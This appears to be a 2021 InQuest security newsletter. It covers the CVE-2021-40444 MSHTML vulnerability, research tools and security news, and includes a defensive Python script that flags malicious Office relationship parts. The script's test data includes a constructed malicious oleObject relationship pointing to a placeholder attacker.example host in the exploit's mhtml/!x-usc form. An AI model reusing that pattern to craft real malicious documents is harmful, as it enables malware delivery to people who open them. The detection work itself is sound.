
InQuest is excited to live on the bleeding edge of malware discovery and be the first to detect attacks targeting the CVE-2021-40444 0-day vulnerability.

This critical Microsoft MSHTML vulnerability will undoubtedly become a prized, low-interaction malware delivery mechanism: exploitation needs only that a target open a crafted Office document, with no macros involved. Threat actors have already leveraged the exploitation technique to drop various malware payloads, including Formbook and Cobalt Strike. The blog post below details some of our initial observations.


Contact Us to learn more about InQuest's Deep File Inspection!

InQuest Mail Provider Comparison

This month we tested 22,843 malicious file samples against Google's and Microsoft's email defenses. Here is what made it through:

GSuite: 1,029 (4.7%) missed
O365 ATP + Phishing: 4,769 (26.3%) missed

InQuire for a free, personalized email security assessment!
Latest InQuest™ Blog Posts

CVE-2021-40444

Posted on 2021-09-13 by Nick Chalard and Dmitry Melikov

As we roll into autumn and the season changes, so does the threat landscape. The emergence of a new CVE signals another arms race, with one side vying to leverage the exploit effectively and the other working to understand how to mitigate its effects. As with all Common Vulnerabilities and Exposures come questions such as “How does this affect me or my organization?” and “What can I do to mitigate this?” The focus of this blog is to explore these concerns as well as to provide further context surrounding CVE-2021-40444 and the initial maldoc delivery.

Read more

Rechnung Financial Malspam

Posted on 2021-09-29 by Dmitry Melikov

Protecting an organization from today's cyber threats is not a simple task. The threat landscape is constantly changing, requiring a flexible approach to defense. The threats, techniques and vulnerabilities that cybercriminals exploit may be unknown to the organizations that provide protection to their users. This is a prime example of the exploitation of a critical vulnerability, an exploit that was found in the wild.

Read more
InQuest™ Labs Research Spotlight

mlget

Use mlget to query multiple sources for a given malware hash and download the sample. The idea is to save the time spent querying each source individually.

Read more

Yobi

Yobi is a basic Firefox extension that runs public or private YARA rules against all scripts and pages rendered by the browser. Yobi saves the files that trigger its rules and allows further inspection of them.

Read more

Newscatcher

Programmatically collect normalized news from (almost) any website. Filter by topic, country, or language.

Read more
Global Security Events

Analyzing attacks that exploit the CVE-2021-40444 MSHTML vulnerability

In August, Microsoft Threat Intelligence Center identified a small number of attacks that attempted to exploit a remote code execution vulnerability in MSHTML using specially crafted Microsoft Office documents. These attacks used the vulnerability, tracked as CVE-2021-40444, as part of an initial access campaign that distributed custom Cobalt Strike Beacon loaders.

Read more
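The CVE-2021-40444 maldocs described above and in the InQuest blog post carry a recognizable artifact in the Office Open XML package: an oleObject relationship marked TargetMode="External" whose target uses the mhtml: scheme with an !x-usc: redirect to the attacker's HTML page. The following Python script is an added example, not code from InQuest or from Microsoft's analysis; it opens a .docx as a zip, parses every .rels part and reports relationships matching that pattern. The two documents it checks are constructed in memory for the demonstration, and the attacker.example host is a placeholder, not a real indicator from any campaign.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Namespaces used by OOXML relationship parts (standard, not specific to any sample).
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OLE_REL_TYPE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/oleObject")


def find_mshtml_indicators(docx_bytes):
    """Scan a .docx (zip) for external oleObject relationships whose target is an
    mhtml: URL containing an !x-usc: redirect. Returns a list of
    (rels_part_name, target) tuples; an empty list means nothing matched."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as pkg:
        for name in pkg.namelist():
            # Relationship parts live under */_rels/*.rels
            if not name.endswith(".rels"):
                continue
            try:
                root = ET.fromstring(pkg.read(name))
            except ET.ParseError:
                # A malformed .rels part is itself worth a look, but is not this check.
                continue
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                target = rel.get("Target", "")
                if (rel.get("Type") == OLE_REL_TYPE
                        and rel.get("TargetMode") == "External"
                        and re.match(r"(?i)^mhtml:", target)
                        and "!x-usc:" in target.lower()):
                    hits.append((name, target))
    return hits


def build_docx(document_rels_xml):
    """Build a minimal .docx in memory around the given document.xml.rels part.
    Constructed for this example; real documents contain many more parts."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as pkg:
        pkg.writestr("[Content_Types].xml",
                     "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>")
        pkg.writestr("word/document.xml",
                     "<w:document xmlns:w='http://schemas.openxmlformats.org/wordprocessingml/2006/main'/>")
        pkg.writestr("word/_rels/document.xml.rels", document_rels_xml)
    return buf.getvalue()


# Constructed relationship part shaped like the CVE-2021-40444 delivery pattern.
# attacker.example is a placeholder host, not a real indicator.
SUSPICIOUS_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId5"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="mhtml:http://attacker.example/word.html!x-usc:http://attacker.example/word.html"
    TargetMode="External"/>
</Relationships>"""

# Constructed benign part: an embedded (internal) OLE object, which is common and harmless here.
BENIGN_RELS = """<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId2"
    Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/oleObject"
    Target="embeddings/oleObject1.bin"/>
</Relationships>"""


def scan_samples():
    """Run the check over both constructed documents and return the results by label."""
    return {
        "suspicious": find_mshtml_indicators(build_docx(SUSPICIOUS_RELS)),
        "benign": find_mshtml_indicators(build_docx(BENIGN_RELS)),
    }


if __name__ == "__main__":
    for label, hits in scan_samples().items():
        print(f"{label}: {len(hits)} indicator(s)")
        for part, target in hits:
            print(f"  {part} -> {target}")
```

The check deliberately requires all three conditions (external mode, mhtml: scheme, !x-usc: redirect) rather than flagging every external OLE link, because linked objects with an external target occur in legitimate documents. It is a triage heuristic for this delivery pattern, not a substitute for detonating the file: a document that passes it can still be malicious by other means, and variants that restructure the relationship target would need the pattern updated.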

Russia arrests top cybersecurity executive in treason case

Russian authorities have arrested the chief executive of a leading Russian cybersecurity company on suspicion of state treason, a court said on Wednesday, sending a chill through Russia's IT and business sectors. Ilya Sachkov, 35, who founded Group IB, one of Russia's most prominent cyber security firms, was arrested on Tuesday, the RTVI TV channel reported as law enforcement officers carried out searches at the Moscow offices of the firm.

Read more

He Escaped the Dark Web's Biggest Bust. Now He's Back

Just over four years ago, the US Department of Justice announced the takedown of AlphaBay, the biggest dark web market bust in history. Thai police arrested the site's 26-year-old administrator, Alexandre Cazes, in Bangkok, and the FBI seized AlphaBay's central server in Lithuania, wiping out a marketplace that was selling hundreds of millions of dollars a year worth of hard drugs, hacked data, and other contraband to its 400,000-plus registered users.

Read more
InQuest™ Insider - Your monthly resource for the latest in cyber security news, trends, tips and tools. Subscribe here.
Copyright © InQuest™ 2021